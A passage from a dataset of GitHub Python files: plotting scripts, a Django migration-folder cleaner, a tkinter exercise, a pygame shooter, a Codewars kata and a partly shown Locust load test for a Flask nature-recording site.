line_style[index-3+1], linewidth=2)\n #plts.append(plt2)\n\n\n\n plt.xlabel(\"Time Step\", size=15)\n plt.ylabel(r\"PCRLB ($m^2$)\", size=15)\n plt.grid(True)\n plt.legend(plts, legends)\n plt.show()\n\n sys.exit(1)\n\n\n plts = []\n legends = [\"Target1\",\"Target2\",\"Target3\",\"Target4\"]\n line_style = [\"-b\",\"-r\",\"-k\",\"-c\"]\n\n for index in range(0,4):\n pcrlb_file = base_dir+ \"pcrlb_single_\"+str(index)+\".txt\"\n pclb = []\n with open(pcrlb_file,\"r\") as f:\n for line in f:\n data = line.strip()\n pclb.append(float(data))\n\n plt1, = plt.plot(range(1,len(pclb)+1), pclb, line_style[index], linewidth=2)\n plts.append(plt1)\n\n plt.xlabel(\"Time Step\", size=15)\n plt.ylabel(r\"Sample PCRLB ($m^2$)\", size=15)\n plt.grid(True)\n plt.legend(plts, legends)\n plt.show()\n\n sys.exit(1)\n\n\n\n plts = []\n legends = [\"Target1\", \"Observer1\",\"Target2\", \"Observer2\",\"Target3\", \"Observer3\",\"Target4\", \"Observer4\",\"Multi-target Observer\"]\n line_style = [\"-b\",\"--b\",\"-r\",\"--r\",\"-k\",\"--k\",\"-c\",\"--c\",\"--m\"]\n\n indexes = [0,1,2,3,4]\n for idx,index in enumerate(indexes):\n truth_file = base_dir+ \"truth_\"+str(index)+\".txt\"\n sensor_file = base_dir+\"sensor_single_\"+str(index)+\".txt\"\n\n x_tuth = []; y_truth = []\n x_observer = []; y_observer = []\n if index<4:\n with open(truth_file,\"r\") as f:\n for line in f:\n data = line.strip().split(\"\\t\")\n x_tuth.append(float(data[0]))\n y_truth.append(float(data[1]))\n\n with open(sensor_file,\"r\") as f:\n for line in f:\n data = line.strip().split(\"\\t\")\n x_observer.append(float(data[0]))\n y_observer.append(float(data[1]))\n\n if index<4:\n plt1, = plt.plot(x_tuth,y_truth,line_style[2*idx],linewidth = 2)\n plt2, = plt.plot(x_observer,y_observer,line_style[2*idx+1],linewidth=2)\n plts.append(plt1)\n plts.append(plt2)\n else:\n plt2, = plt.plot(x_observer, y_observer, line_style[2*idx], linewidth=4)\n plts.append(plt2)\n\n plt.xlabel(\"X (m)\", size=15)\n plt.ylabel(\"Y (m)\", size=15)\n plt.grid(True)\n plt.legend(plts, legends,loc=2)\n plt.show()\n\n\n","repo_name":"gorjida/MultiSensorMutiTargetRL","sub_path":"trajectory_generation_experiment_plots.py","file_name":"trajectory_generation_experiment_plots.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"5238851350","text":"import shutil\nimport os\n\n\nclass _ProjectManager:\n def __init__(self) -> None:\n self.success = False\n\n def get_user_choice(self):\n options = \"[1] Clear all migrations folders in this working directory\\n\" \\\n \"[2] Provide a path to clear migrations folders\\n\" \\\n\n print(\n \"----- Make sure you have a backup for your folders -----\")\n choice = input(\"Options:\\n\" + options + \"Enter your choice: \").strip()\n if choice.lower() == \"1\":\n cwd = os.getcwd()\n print(f\"[*] {cwd}\")\n return cwd\n elif choice.lower() == \"2\":\n folder_path = input(\"Provide the folder path: \").strip()\n if os.path.isdir(folder_path):\n if not self.is_dir_empty(folder_path):\n print(f\"[*] {folder_path}\")\n return folder_path\n else:\n print(\"The folder is empty.\")\n else:\n print(\"The path is not a folder.\")\n else:\n print(\"Exit.....\")\n os._exit(0)\n\n def confirm_deletions(self):\n \"\"\"\n Prompt the user for confirmation to delete a file or directory.\n\n Returns:\n bool: True if the user confirms, False otherwise.\n \"\"\"\n choice = input(\n \"Are you sure you want to continue with this path? (y/n): \").title()\n return choice.lower() == \"y\"\n\n def is_dir_empty(self, directory):\n \"\"\"\n Check if a directory is empty.\n\n Args:\n directory (str): The path to the directory.\n\n Returns:\n bool: True if the directory is empty, False otherwise.\n \"\"\"\n return not any(os.scandir(directory))\n\n def rest_migrations(self, cwd):\n \"\"\"\n Delete a file or an empty directory.\n\n Args:\n cwd (str): The current working directory.\n \"\"\"\n if os.path.isdir(cwd):\n for entry in os.scandir(cwd):\n if entry.name == \"migrations\" and entry.is_dir() and not self.is_dir_empty(entry.path):\n self.success = True\n parent_dir = os.path.basename(os.path.dirname(entry.path))\n print(f\"[*] {parent_dir} App:\")\n for subentry in os.scandir(entry.path):\n self.delete_entry(subentry)\n print(\"\")\n elif entry.is_dir():\n self.rest_migrations(entry.path)\n\n def delete_entry(self, entry, sub_tap=''):\n \"\"\"\n Delete a file or a directory (empty or non-empty), excluding folders containing __init__.py.\n\n Args:\n entry (os.DirEntry): The file or directory entry to delete.\n sub_tap (str): The indentation for printing.\n \"\"\"\n try:\n if entry.is_dir():\n if not self.is_dir_empty(entry.path):\n sub_tap = '\\t'\n has_init = False\n for subentry in os.scandir(entry.path):\n if subentry.name == \"__init__.py\" and subentry.is_file():\n has_init = True\n else:\n self.delete_entry(subentry, sub_tap)\n if has_init:\n print(\n f\"\\n\\t{sub_tap}[+] Can't be Deleted __init__.py --- {entry.path}\\n\")\n else:\n shutil.rmtree(entry.path)\n print(\n f\"\\t{sub_tap}Deleted Directory {entry.path}\")\n else:\n os.rmdir(entry.path)\n print(f\"\\t{sub_tap}Deleted Directory {entry.path}\")\n elif entry.is_file() and entry.name != \"__init__.py\":\n os.remove(entry.path)\n print(f\"\\t{sub_tap}Deleted File --- {entry.path}\")\n else:\n print(\n f\"\\n\\t{sub_tap}[+] Can't be Deleted __init__.py --- {entry.path}\\n\")\n except Exception as e:\n raise e\n","repo_name":"heXaCo0l/rest-migrations","sub_path":"rest_migrations/rm.py","file_name":"rm.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39944050470","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Lab 2\")\nroot.geometry('805x450+10+10')\nroot.config(bg='#84BF04')\n\ntex = Listbox(root, height=13, width=100)\ntex.grid(row=1, column=0)\n\nn = 0\nfor x in range(100):\n n = 10 ** x + n\n tex.insert(x, n)\n\n\nbutton_exit = Button(root, text=\"Exit\", width=8, pady=20, command=root.destroy)\nbutton_exit.grid(row=0, column=0)\nLabel(root, text=\"Scrollable\").grid(row=2, column=0)\n\nroot.mainloop()\n","repo_name":"DJA-prog/Tutorials-Python","sub_path":"HelpPy/LAB2_Ch10_gui.py","file_name":"LAB2_Ch10_gui.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7342307610","text":"import pygame, random\nfrom os import path\n\nimgDir = path.join(path.dirname(__file__), 'img')\nsndDir = path.join(path.dirname(__file__), 'snd')\n\nWIDTH = 640\nHEIGHT = 480\nFPS = 30\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\n\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Proper Game v2\")\nclock = pygame.time.Clock()\nfontName = pygame.font.match_font('arial')\n\nall_sprites = pygame.sprite.Group()\nmobs = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\nboxes = pygame.sprite.Group()\n\n\nclass Ship(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(path.join(imgDir, \"ship3.png\"))\n # self.image.set_colorkey(SHIP)\n self.sndShoot = pygame.mixer.Sound(path.join(sndDir, 'laserShoot.wav'))\n self.sndShoot.set_volume(0.6)\n self.rect = self.image.get_rect()\n self.radius = 1\n pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.centerx = 50\n self.rect.bottom = HEIGHT / 2\n self.speedx = 0\n self.speedy = 0\n self.vel = 12\n self.fuel = 100\n self.lastUpdateTime = pygame.time.get_ticks()\n self.shootDelay = 250\n self.lastShot = pygame.time.get_ticks()\n\n def update(self):\n self.speedx = 0\n self.speedy = 0\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_RIGHT]:\n self.speedx = self.vel\n\n if keys[pygame.K_LEFT]:\n self.speedx = -self.vel\n\n if keys[pygame.K_UP]:\n self.speedy = -self.vel\n\n if keys[pygame.K_DOWN]:\n self.speedy += self.vel\n\n if keys[pygame.K_SPACE]:\n self.shoot()\n\n self.rect.x += self.speedx\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n self.rect.y += self.speedy\n if self.rect.top < 0:\n self.rect.top = 0\n if self.rect.bottom > HEIGHT:\n self.rect.bottom = HEIGHT\n\n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay:\n self.lastShot = now\n bullet = Bullet(self.rect.right, self.rect.centery + 7)\n all_sprites.add(bullet)\n bullets.add(bullet)\n self.sndShoot.play()\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.bulletImg = pygame.image.load(path.join(imgDir, \"fire15.png\")).convert()\n self.image = pygame.transform.scale(self.bulletImg, (15, 7))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedx = 20\n\n def update(self):\n self.rect.x += self.speedx\n if self.rect.left > WIDTH:\n self.kill()\n\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.meteorImgs = []\n self.meteorList = ['meteorBrown_big1.png', 'meteorBrown_big2.png', 'meteorBrown_big3.png',\n 'meteorBrown_med1.png', 'meteorBrown_med2.png', 'meteorBrown_small1.png',\n 'meteorBrown_small2.png', 'meteorBrown_tiny1.png']\n for met in self.meteorList:\n self.meteorImgs.append(pygame.image.load(path.join(imgDir, met)).convert())\n self.imageOrig = random.choice(self.meteorImgs)\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * .85 / 2)\n self.rect.x = random.randrange(WIDTH, WIDTH + 100)\n self.rect.y = random.randrange(0, HEIGHT - self.rect.height)\n self.speedx = random.randrange(1, 8)\n self.speedy = random.randrange(-3, 3)\n self.rot = 0\n self.rotSpeed = random.randrange(-8, 8)\n self.lastUpdateTime = pygame.time.get_ticks()\n\n def rotate(self):\n timeNow = pygame.time.get_ticks()\n if timeNow - self.lastUpdateTime > 50:\n self.lastUpdateTime = timeNow\n self.rot = self.rot + self.rotSpeed % 360\n newImage = self.image = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter\n\n def update(self):\n self.rotate()\n self.rect.y += self.speedy\n self.rect.x -= self.speedx\n if self.rect.right < 0 or self.rect.bottom > HEIGHT + 10 or self.rect.top < 0:\n self.rect.x = random.randrange(WIDTH, WIDTH + 40)\n self.rect.y = random.randrange(0, HEIGHT - self.rect.height)\n self.speedx = random.randrange(1, 8)\n\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.explosionAnim = {}\n self.explosionAnim['lg'] = []\n self.explosionAnim['sm'] = []\n for i in range(9):\n filename = 'regularExplosion0{}.png'.format(i)\n img = pygame.image.load(path.join(imgDir, filename)) # .convert()\n imgLg = pygame.transform.scale(img, (75, 75))\n self.explosionAnim['lg'].append(imgLg)\n imgSm = pygame.transform.scale(img, (32, 32))\n self.explosionAnim['sm'].append(imgSm)\n self.size = size\n self.sndExplosion = pygame.mixer.Sound(path.join(sndDir, 'explosion.wav'))\n self.sndExplosion.set_volume(0.5)\n self.image = self.explosionAnim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.lastUpdate = pygame.time.get_ticks()\n self.frameRate = 50\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > self.frameRate:\n self.lastUpdate = now\n self.frame += 1\n if self.frame == len(self.explosionAnim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = self.explosionAnim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n\nclass Space(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(path.join(imgDir, \"bg.gif\")).convert()\n self.rect = self.image.get_rect()\n self.dx = 5\n self.reset()\n\n def update(self):\n self.rect.right -= self.dx\n if self.rect.right <= 640:\n self.reset()\n\n def reset(self):\n self.rect.right = 1920\n\n\nclass Scoreboard(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.lives = 5\n self.level = 1\n self.score = 0\n self.text = \"\"\n self.image = \"\"\n self.rect = \"\"\n self.font = pygame.font.SysFont(\"None\", 50)\n\n def update(self):\n self.text = \"Ships: %d, Score: %d, Level: %d\" % (self.lives, self.score, self.level)\n self.image = self.font.render(self.text, 1, (255, 255, 0))\n self.rect = self.image.get_rect()\n\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((40, random.randrange(10, HEIGHT / 2)))\n self.image.fill(YELLOW)\n self.rect = self.image.get_rect()\n self.rect.left = WIDTH\n self.rect.bottom = 454\n self.speed_x = 0\n\n def update(self):\n self.speed_x = 0\n self.speed_x -= 10\n self.rect.x += self.speed_x\n if self.rect.right < 0:\n self.kill()\n\n\nclass Game(pygame.sprite.Sprite):\n def __init__(self, screen):\n pygame.sprite.Sprite.__init__(self)\n self.background = pygame.Surface(screen.get_size())\n self.background.fill((0, 0, 0))\n self.screen = screen\n self.screen.blit(self.background, (0, 0))\n self.player = Ship()\n self.space = Space()\n self.mob = Mob()\n self.scoreboard = Scoreboard()\n self.friendSprites = pygame.sprite.Group(self.space, self.player)\n self.scoreSprite = pygame.sprite.Group(self.scoreboard)\n\n def create_mob(self):\n self.mob = Mob()\n all_sprites.add(self.mob)\n mobs.add(self.mob)\n\n def draw_live_bar(self, surf, x, y, pct):\n if pct < 0:\n pct = 0\n bar_length = 400\n bar_height = 20\n fill = (pct / 100) * bar_length\n fill_rect = pygame.Rect(x, y, fill, bar_height)\n outline_rect = pygame.Rect(x, y, bar_length, bar_height)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\n def drawText(self, surf, text, size, x, y):\n font = pygame.font.Font(fontName, size)\n textSurface = font.render(text, True, WHITE)\n textRect = textSurface.get_rect()\n textRect.midtop = (x, y)\n surf.blit(textSurface, textRect)\n\n def create_box(self):\n box = Box()\n if not boxes:\n boxes.add(box)\n all_sprites.add(box)\n else:\n box.rect.left = boxes.sprites()[-1].rect.right\n boxes.add(box)\n all_sprites.add(boxes)\n\n def instructions(self, score):\n ship = Ship()\n space = Space()\n all_sprites = pygame.sprite.Group(space, ship)\n insFont = pygame.font.SysFont(None, 50)\n insLabels = []\n instructions = (\n \"Mail Pilot. Last score: %d\" % score,\n \"Instructions: You are a mail pilot,\",\n \"delivering mail to the islands.\",\n \"\",\n \"Fly over an island to drop the mail,\",\n \"but be careful not to fly too close\",\n \"to the clouds. Your plane will fall \",\n \"apart if it is hit by lightning too\",\n \"many times. Steer with the mouse.\",\n \"\",\n \"good luck!\",\n \"\",\n \"click to start, escape to quit...\"\n )\n\n for line in instructions:\n tempLabel = insFont.render(line, 1, (255, 255, 0))\n insLabels.append(tempLabel)\n\n keepGoing = True\n pygame.mouse.set_visible(False)\n while keepGoing:\n clock.tick(30)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keepGoing = False\n donePlaying = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n keepGoing = False\n donePlaying = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n keepGoing = False\n donePlaying = True\n\n all_sprites.update()\n all_sprites.draw(screen)\n\n for i in range(len(insLabels)):\n screen.blit(insLabels[i], (50, 30 * i))\n\n pygame.display.flip()\n\n pygame.mouse.set_visible(False)\n return donePlaying\n\n def play(self):\n for i in range(8):\n self.create_mob()\n # pygame.mixer.music(path.join(sndDir, 'sndBackground.waw'))\n # pygame.mixer.music.set_volume(0.4)\n # pygame.mixer.music.play(loops=-1)\n time_start = pygame.time.get_ticks()\n running = True\n while running:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n time_now = pygame.time.get_ticks()\n if time_now - time_start > 120:\n self.create_box()\n time_start = time_now\n\n if time_now - self.player.lastUpdateTime > 300:\n self.player.fuel -= 1\n self.player.lastUpdateTime = time_now\n\n if self.player.fuel <= 0:\n running = False\n\n # check mob hit player\n hits = pygame.sprite.spritecollide(self.player, boxes, False, pygame.sprite.collide_circle)\n for hit in hits:\n exp = Explosion(hit.rect.center, 'lg')\n exp.sndExplosion.play()\n all_sprites.add(exp)\n self.player.kill()\n self.scoreboard.lives -= 1\n if self.scoreboard.lives <= 0:\n running = False\n self.player = Ship()\n self.player.rect.y = 30\n all_sprites.add(self.player)\n\n # check bullet hit a mob\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n for hit in hits:\n exp = Explosion(hit.rect.center, 'sm')\n exp.sndExplosion.play()\n self.scoreboard.score += 100 - hit.radius\n all_sprites.add(exp)\n self.create_mob()\n # check mob hit player\n hits = pygame.sprite.spritecollide(self.player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n exp = Explosion(hit.rect.center, 'lg')\n exp.sndExplosion.play()\n all_sprites.add(exp)\n self.scoreboard.lives -= 1\n if self.scoreboard.lives <= 0:\n running = False\n\n # Update\n all_sprites.update()\n self.friendSprites.update()\n self.scoreSprite.update()\n\n # Draw / Render\n self.friendSprites.draw(screen)\n self.scoreSprite.draw(screen)\n # screen.fill(BLACK)\n all_sprites.draw(screen)\n # drawText(screen, \"Score: \" + str(score), 18, HEIGHT / 2, 10)\n self.drawText(screen, \"FUEL\", 20, 95, 456)\n self.draw_live_bar(screen, 120, 456, self.player.fuel)\n # after drawing everything flip the display\n\n pygame.display.flip()\n return self.scoreboard.score\n\n\ndef main():\n done_playing = False\n score = 0\n game = Game(screen)\n while not done_playing:\n done_playing = game.instructions(score)\n if not done_playing:\n score = game.play()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dursuneryilmaz/Arcade-Game-Konami-Scramble","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":14486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40220259670","text":"import os\nimport json\nimport numpy as np\n\n\ndef write_preds_to_txt(path_to_pred_json_file, save_path):\n pred_json = json.load(open(path_to_pred_json_file, \"rb\"))[\"0\"]\n s = \"\"\n print(\"Writing results for {} sentences\".format(len(pred_json)))\n for i, sentence in enumerate(pred_json):\n s += \"====== Sentence {} ======\\n\".format(i)\n raw_sentence = sentence[\"raw_sentence\"]\n predictions = sentence[\"predictions\"]\n sentence_with_masks = sentence[\"sentence_with_masks\"]\n s += \"Sentence: {}\\nSentence with masks: {}\\n\\n\".format(raw_sentence, sentence_with_masks)\n for j, masked_question in enumerate(predictions):\n correct_token = masked_question[\"masked_word\"].replace(\"#\", \"\")\n s += \"## Mask {}\\nCorrect token: {}\\n\".format(j, correct_token)\n for model, value in masked_question[\"model_data\"].items():\n pred = value[\"top_n_preds\"][0].replace(\"#\", \"\")\n correct_rank = value[\"correct_rank\"]\n correct_prob = round(value[\"correct_prob\"],2)\n s += \"{}: {} correct_rank: {} correct_prob: {}\\n\".format(model, pred, correct_rank, correct_prob)\n s += \"\\n\"\n with open(save_path,\"w\") as o:\n o.write(s)\n\n\npath_to_pred_json_file = \"/Users/ardaakdemir/dprk_research/dprk-bert-data/error_analysis_results_2510.json\"\nsave_path =\"../dprk-bert-data/error-analysis-2610.txt\"\npred_json = json.load(open(path_to_pred_json_file, \"rb\"))\n# print(pred_json[\"0\"][0].keys())\nsentence = pred_json[\"0\"][0]\nprediction_example = sentence[\"predictions\"]\nprint(sentence[\"raw_sentence\"])\nprint(sentence[\"sentence_with_masks\"])\nprint(prediction_example)\n\nwrite_preds_to_txt(path_to_pred_json_file, save_path)","repo_name":"ardakdemir/DPRK-BERT","sub_path":"mlm_error_analysis.py","file_name":"mlm_error_analysis.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40355986314","text":"# Create a function that returns the name of the winner in a fight between two \n# fighters.\n#\n# Each fighter takes turns attacking the other and whoever kills the other \n# first is victorious. Death is defined as having health <= 0.\n#\n# Each fighter will be a Fighter object/instance. See the Fighter class below \n# in your chosen language.\n#\n# Both health and damagePerAttack (damage_per_attack for python) will be \n# integers larger than 0. You can mutate the Fighter objects.\n#\n# Your function also receives a third argument, a string, with the name of the \n# fighter that attacks first.\n# Example:\n#\n# declare_winner(Fighter(\"Lew\", 10, 2), Fighter(\"Harry\", 5, 4), \"Lew\") => \n# \"Lew\"\n# \n# Lew attacks Harry; Harry now has 3 health.\n# Harry attacks Lew; Lew now has 6 health.\n# Lew attacks Harry; Harry now has 1 health.\n# Harry attacks Lew; Lew now has 2 health.\n# Lew attacks Harry: Harry now has -1 health and is dead. Lew wins.\n#\n# class Fighter(object):\n# def __init__(self, name, health, damage_per_attack):\n# self.name = name\n# self.health = health\n# self.damage_per_attack = damage_per_attack\n# \n# def __str__(self): return \"Fighter({}, {}, {})\".format(self.name, self.\n# health, self.damage_per_attack)\n# __repr__=__str__\nfrom math import ceil\n\ndef declare_winner(fighter1, fighter2, first_attacker):\n # # Full simulation method\n # attacker = fighter1 if fighter1.name == first_attacker else fighter2\n # receiver = fighter2 if fighter1.name == first_attacker else fighter1\n # while True:\n # receiver.health -= attacker.damage_per_attack\n # if receiver.health <= 0:\n # return attacker.name\n # attacker, receiver = receiver, attacker\n round1 = ceil(fighter1.health / fighter2.damage_per_attack)\n round2 = ceil(fighter2.health / fighter1.damage_per_attack)\n if round1 == round2:\n return first_attacker\n elif round1 > round2:\n return fighter1.name\n else:\n return fighter2.name\n ","repo_name":"jeffwork2021/Codewars","sub_path":"Two fighters, one winner.py","file_name":"Two fighters, one winner.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25214250572","text":"import os\nimport time\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom random import randrange\nfrom locust import HttpUser, task, between, events\nfrom locust_tests.flask_app_runner import FlaskAppRunner\nfrom naturerec_model.model import create_database, get_data_path, Sighting\nfrom naturerec_model.logic import list_locations, list_categories, list_species, create_user\nfrom naturerec_model.data_exchange import SightingsImportHelper, StatusImportHelper\nfrom naturerec_web import create_app\n\nTEST_USER_NAME = \"locust\"\nTEST_PASSWORD = \"password\"\n\n\nflask_runner = FlaskAppRunner(\"127.0.0.1\", 5000, create_app())\n\n\n@events.test_start.add_listener\ndef on_test_start(environment, **kwargs):\n \"\"\"\n Before any tests run, start the Flask application\n\n :param environment: Ignored\n :param kwargs: Ignored\n \"\"\"\n # Reset the database\n create_database()\n\n # Create a login\n create_user(TEST_USER_NAME, TEST_PASSWORD)\n\n # Import some sample sightings\n sightings_file = os.path.join(get_data_path(), \"imports\", \"locust_sightings.csv\")\n with open(sightings_file, mode=\"rt\", encoding=\"utf-8\") as f:\n importer = SightingsImportHelper(f)\n importer.start()\n importer.join()\n\n # Import a sample conservation status scheme\n scheme_file = os.path.join(get_data_path(), \"imports\", \"locust_bocc5.csv\")\n with open(scheme_file, mode=\"rt\", encoding=\"utf-8\") as f:\n importer = StatusImportHelper(f)\n importer.start()\n importer.join()\n\n # Start the site\n global flask_runner\n flask_runner.start()\n\n\n@events.test_stop.add_listener\ndef on_test_stop(environment, **kwargs):\n \"\"\"\n When the tests complete, stop the Flask application\n\n :param environment: Ignored\n :param kwargs: Ignored\n \"\"\"\n global flask_runner\n flask_runner.stop_server()\n flask_runner.join()\n\n\nclass NatureRecorderUser(HttpUser):\n \"\"\"\n Locust load test, targeting the Nature Recorder application hosted locally in the flask development server. The\n tests are weighted as follows:\n\n +----------------------------------+----+\n | Test | % |\n +----------------------------------+----+\n | go_to_home_page | 1 |\n +----------------------------------+----+\n | list_locations | 1 |\n +----------------------------------+----+\n | add_location | 1 |\n +----------------------------------+----+\n | list_categories | 1 |\n +----------------------------------+----+\n | add_category | 1 |\n +----------------------------------+----+\n | list_species | 1 |\n +----------------------------------+----+\n | add_species | 1 |\n +----------------------------------+----+\n | list_sightings | 20 |\n +----------------------------------+----+\n | add_sighting | 70 |\n +----------------------------------+----+\n | list_conservation_status_schemes | 1 |\n +----------------------------------+----+\n | show_life_list | 1 |\n +----------------------------------+----+\n | list_recent_background_jobs | 1 |\n +----------------------------------+----+\n \"\"\"\n\n #: Simulated users will wait between 1 and 5 seconds per task\n wait_time = between(1, 5)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._locations = None\n self._categories = None\n\n def on_start(self):\n \"\"\"\n Establish some facts about the data so the tests can simulate realistic actions\n \"\"\"\n self._locations = list_locations()\n self._categories = list_categories()\n self._login()\n\n @task\n def go_to_home_page(self):\n \"\"\"\n Task to open the home page of the application\n \"\"\"\n self.client.get(\"/\")\n\n @task\n def list_locations(self):\n \"\"\"\n Task to simulate listing the locations\n \"\"\"\n self.client.get(\"/locations/list\")\n\n @task\n def add_location(self):\n \"\"\"\n Task to simulate adding a location\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/locations/edit\")\n name = self._get_name(\"Location\")\n county = self._get_name(\"County\")\n country = self._get_name(\"Country\")\n self.client.post(\"/locations/edit\", data={\n \"name\": name,\n \"address\": \"\",\n \"city\": \"\",\n \"county\": county,\n \"postcode\": \"\",\n \"country\": country,\n \"latitude\": \"\",\n \"longitude\": \"\",\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_categories(self):\n \"\"\"\n Task to simulate listing the categories\n \"\"\"\n self.client.get(\"/categories/list\")\n\n @task\n def add_category(self):\n \"\"\"\n Task to simulate adding a category\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/categories/edit\")\n name = self._get_name(\"Category\")\n self.client.post(\"/categories/edit\", data={\n \"name\": name,\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_species(self):\n \"\"\"\n Task to simulate listing the species belonging to a selected category\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/species/list\")\n category_id = self._get_random_category_id()\n self.client.post(\"/species/list\", data={\n \"category\": str(category_id),\n \"csrf_token\": csrf_token\n })\n\n @task\n def add_species(self):\n \"\"\"\n Task to simulate adding a species\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/species/add\")\n category_id = self._get_random_category_id()\n name = self._get_name(\"Species\")\n self.client.post(\"/species/add\", data={\n \"category\": str(category_id),\n \"name\": name,\n \"csrf_token\": csrf_token\n })\n\n @task(20)\n def list_sightings(self):\n \"\"\"\n Task to simulate listing the sightings\n \"\"\"\n self.client.get(\"/sightings/list\")\n\n @task(70)\n def add_sighting(self):\n \"\"\"\n Task to simulate adding a new sighting\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/sightings/edit\")\n sighting_date = datetime.datetime.today().strftime(Sighting.DATE_DISPLAY_FORMAT)\n location_id = self._get_random_location_id()\n category_id = self._get_random_category_id()\n species_id = self._get_random_species_id(category_id)\n self.client.post(\"/sightings/edit\", data={\n \"date\": sighting_date,\n \"location\": str(location_id),\n \"category\": str(category_id),\n \"species\": str(species_id),\n \"number\": \"1\",\n \"gender\": \"0\",\n \"with_young\": \"0\",\n \"notes\": \"\",\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_conservation_status_schemes(self):\n \"\"\"\n Task to simulate listing the conservation status schemes\n \"\"\"\n self.client.get(\"/status/list\")\n\n @task\n def show_life_list(self):\n \"\"\"\n Task to simulate showing the life list for a category\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/life_list/list\")\n category_id = self._get_random_category_id()\n self.client.post(\"/life_list/list\", data={\n \"category\": str(category_id),\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_recent_background_jobs(self):\n \"\"\"\n Task to simulate listing the recent background jobs\n \"\"\"\n self.client.get(\"/jobs/list\")\n\n def _login(self):\n \"\"\"\n Log in using the test account\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/auth/login\")\n self.client.post(\"/auth/login\", data={\n \"username\": TEST_USER_NAME,\n \"password\": TEST_PASSWORD,\n \"csrf_token\": csrf_token\n })\n\n def _get_csrf_token_for_form(self, url):\n \"\"\"\n Request a page containing a form and return the CSRF token from it\n\n :param url: URL for the page containing the form\n :return: CSFR token\n \"\"\"\n response = self.client.get(url)\n form_data = BeautifulSoup(response.text, \"html.parser\")\n csrf_token_field = form_data.find(attrs={\"name\": \"csrf_token\"})\n return csrf_token_field[\"value\"]\n\n def _get_random_location_id(self):\n \"\"\"\n Return a random location ID for an existing location\n \"\"\"\n index = randrange(0, len(self._locations))\n return self._locations[index].id\n\n def _get_random_category_id(self):\n \"\"\"\n Return a random category ID for an existing category\n \"\"\"\n index = randrange(0, len(self._categories))\n return self._categories[index].id\n\n @staticmethod\n def _get_random_species_id(category_id):\n \"\"\"\n Return a random species ID for species in the specified category\n\n :param category_id: Category ID from which to select a species\n \"\"\"\n species = list_species(category_id)\n index = randrange(0, len(species))\n return species[index].id\n\n def _get_name(self, prefix):\n \"\"\"\n Construct a unique name for a new record with the specified 